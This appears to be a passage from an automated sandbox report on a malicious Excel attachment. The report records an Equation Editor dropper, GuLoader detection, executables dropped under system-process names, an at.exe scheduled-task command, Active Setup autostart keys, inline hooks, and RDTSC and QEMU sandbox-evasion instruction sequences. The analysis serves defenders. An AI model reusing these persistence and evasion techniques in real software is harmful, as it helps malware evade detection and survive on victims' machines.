Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process created: unknown unknown

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: Required Order Quantity.xlsx

Static file information: File size 2496512 > 1048576

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: wntdll.pdb source: vbc.exe
Source:	Binary string: wuapp.pdb source: explorer.exe, 00000008.00000003.2221194170.000000000095A000.00000004.00000001.sdmp

Source: Required Order Quantity.xlsx

Initial sample: OLE indicators vbamacros = False

Source: Required Order Quantity.xlsx

Initial sample: OLE indicators encrypted = True

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match

File source: Process Memory Space: vbc.exe PID: 2464, type: MEMORY

Yara detected VB6 Downloader Generic

Show sources

Source: Yara match

File source: Process Memory Space: vbc.exe PID: 2464, type: MEMORY

Source: stsys.exe.10.dr	Static PE information: real checksum: 0x3b1c8 should be: 0x3663f
Source: explorer.exe.7.dr	Static PE information: real checksum: 0x3b1c8 should be: 0x3c2f2
Source: icsys.icn.exe.4.dr	Static PE information: real checksum: 0x3b1c8 should be: 0x41d85
Source: spoolsv.exe.8.dr	Static PE information: real checksum: 0x3b1c8 should be: 0x35692
Source: mrsys.exe.8.dr	Static PE information: real checksum: 0x3b1c8 should be: 0x3a870
Source: svchost.exe.9.dr	Static PE information: real checksum: 0x3b1c8 should be: 0x39637

Source: C:\Users\Public\vbc.exe	Code function: 5_2_00405A3F push ecx; ret	5_2_00405A3D
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0040715D push es; ret	5_2_004071DB
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004059E4 push ecx; ret	5_2_004059E5
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004059FB push ecx; ret	5_2_00405A3D
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004059A0 push ecx; ret	5_2_004059D5
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004075BC push es; retf	5_2_004075CB
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D0076 push esp; iretd	5_2_003D0077
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D00E3 push esp; iretd	5_2_003D00E4
Source: C:\Windows\system\explorer.exe	Code function: 8_2_03E0F867 push edx; retf	8_2_03E0F869
Source: C:\Windows\system\explorer.exe	Code function: 8_2_03E08FA6 push ebx; ret	8_2_03E08FA7
Source: C:\Windows\system\explorer.exe	Code function: 8_2_03E14F6C push eax; ret	8_2_03E14F72
Source: C:\Windows\system\explorer.exe	Code function: 8_2_03E14F02 push eax; ret	8_2_03E14F08
Source: C:\Windows\system\explorer.exe	Code function: 8_2_03E0E625 push ds; retf	8_2_03E0E626
Source: C:\Windows\system\svchost.exe	Code function: 10_2_0018E20A push eax; iretd	10_2_0018E231
Source: C:\Windows\system\svchost.exe	Code function: 10_2_0018E126 push eax; iretd	10_2_0018E209
Source: C:\Windows\system\svchost.exe	Code function: 10_2_0018E340 push eax; iretd	10_2_0018E341
Source: C:\Windows\system\svchost.exe	Code function: 10_2_005DBAE5 push ebp; iretd	10_2_005DBAE6
Source: C:\Windows\system\svchost.exe	Code function: 10_2_005DC33C push B8764892h; retn 005Dh	10_2_005DC341
Source: C:\Windows\system\svchost.exe	Code function: 10_2_005D58B6 push 6900005Dh; retf	10_2_005D6632
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB2DFA1 push ecx; ret	18_2_1EB2DFB4

Persistence and Installation Behavior:

Drops PE files with benign system names

Show sources

Source: C:\Windows\system\spoolsv.exe	File created: C:\Windows\system\svchost.exe	Jump to dropped file
Source: C:\Windows\system\explorer.exe	File created: C:\Windows\system\spoolsv.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\icsys.icn.exe	File created: C:\Windows\system\explorer.exe	Jump to dropped file

Drops executables to the windows directory (C:\Windows) and starts them

Show sources

Source: C:\Windows\system\svchost.exe	Executable created and started: c:\windows\system\spoolsv.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Executable created and started: c:\windows\system\explorer.exe	Jump to behavior
Source: C:\Windows\system\spoolsv.exe	Executable created and started: c:\windows\system\svchost.exe	Jump to behavior

Source: C:\Windows\system\spoolsv.exe	File created: C:\Windows\system\svchost.exe	Jump to dropped file
Source: C:\Windows\system\explorer.exe	File created: C:\Users\user\AppData\Roaming\mrsys.exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe	Jump to dropped file
Source: C:\Windows\system\explorer.exe	File created: C:\Windows\system\spoolsv.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\icsys.icn.exe	Jump to dropped file
Source: C:\Windows\system\svchost.exe	File created: C:\Users\user\AppData\Local\stsys.exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\icsys.icn.exe	File created: C:\Windows\system\explorer.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\Public\vbc.exe	Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Source: C:\Windows\system\spoolsv.exe	File created: C:\Windows\system\svchost.exe	Jump to dropped file
Source: C:\Windows\system\explorer.exe	File created: C:\Windows\system\spoolsv.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\icsys.icn.exe	File created: C:\Windows\system\explorer.exe	Jump to dropped file

Source: C:\Users\Public\vbc.exe

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Creates an undocumented autostart registry key

Show sources

Source: C:\Windows\system\explorer.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath

Jump to behavior

Drops PE files to the user root directory

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: C:\Windows\system\svchost.exe

Process created: C:\Windows\SysWOW64\at.exe at 07:50 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe

Hooking and other Techniques for Hiding and Protection:

Changes the view of files in windows explorer (hidden files and folders)

Show sources

Source: C:\Windows\system\explorer.exe

Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced ShowSuperHidden

Jump to behavior

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8F 0xFE 0xE5

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\spoolsv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\spoolsv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\spoolsv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\spoolsv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\spoolsv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\spoolsv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\spoolsv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\spoolsv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\spoolsv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\spoolsv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\system\spoolsv.exe	Process information set: NOOPENFILEERRORBOX

Source: Required Order Quantity.xlsx

Stream path 'EncryptedPackage' entropy: 7.99991075725 (max. 8.0)

Malware Analysis System Evasion:

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Show sources

Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003D872E second address: 00000000003D87E6 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a xor edi, edi 0x0000000c cmp bh, bh 0x0000000e mov dword ptr [ebp+000000F8h], 00A95F60h 0x00000018 test dx, dx 0x0000001b test eax, edx 0x0000001d call 00007FEA5874D793h 0x00000022 call 00007FEA5874D718h 0x00000027 lfence 0x0000002a mov edx, dword ptr [7FFE0014h] 0x00000030 lfence 0x00000033 ret 0x00000034 mov esi, edx 0x00000036 pushad 0x00000037 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003D87E6 second address: 00000000003D87E6 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007FEA5877F4D8h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d jmp 00007FEA5877F4FEh 0x0000001f cmp bl, 0000006Dh 0x00000022 add edi, edx 0x00000024 dec dword ptr [ebp+000000F8h] 0x0000002a cmp dword ptr [ebp+000000F8h], 00000000h 0x00000031 jne 00007FEA5877F489h 0x00000033 test eax, edx 0x00000035 call 00007FEA5877F563h 0x0000003a call 00007FEA5877F4E8h 0x0000003f lfence 0x00000042 mov edx, dword ptr [7FFE0014h] 0x00000048 lfence 0x0000004b ret 0x0000004c mov esi, edx 0x0000004e pushad 0x0000004f rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003D0C26 second address: 00000000003D0C26 instructions:
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003D3F33 second address: 00000000003D3F33 instructions:
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003D3FF5 second address: 00000000003D3FF5 instructions:

Tries to detect Any.run

Show sources

Source: C:\Users\Public\vbc.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\Public\vbc.exe	File opened: C:\Program Files\qga\qga.exe

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: vbc.exe

Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003D872E second address: 00000000003D87E6 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a xor edi, edi 0x0000000c cmp bh, bh 0x0000000e mov dword ptr [ebp+000000F8h], 00A95F60h 0x00000018 test dx, dx 0x0000001b test eax, edx 0x0000001d call 00007FEA5874D793h 0x00000022 call 00007FEA5874D718h 0x00000027 lfence 0x0000002a mov edx, dword ptr [7FFE0014h] 0x00000030 lfence 0x00000033 ret 0x00000034 mov esi, edx 0x00000036 pushad 0x00000037 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003D87E6 second address: 00000000003D87E6 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007FEA5877F4D8h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d jmp 00007FEA5877F4FEh 0x0000001f cmp bl, 0000006Dh 0x00000022 add edi, edx 0x00000024 dec dword ptr [ebp+000000F8h] 0x0000002a cmp dword ptr [ebp+000000F8h], 00000000h 0x00000031 jne 00007FEA5877F489h 0x00000033 test eax, edx 0x00000035 call 00007FEA5877F563h 0x0000003a call 00007FEA5877F4E8h 0x0000003f lfence 0x00000042 mov edx, dword ptr [7FFE0014h] 0x00000048 lfence 0x0000004b ret 0x0000004c mov esi, edx 0x0000004e pushad 0x0000004f rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003D8806 second address: 00000000003D8806 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007FEA5874DF0Ch 0x0000001d popad 0x0000001e call 00007FEA5874D886h 0x00000023 lfence 0x00000026 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003D0C26 second address: 00000000003D0C26 instructions:
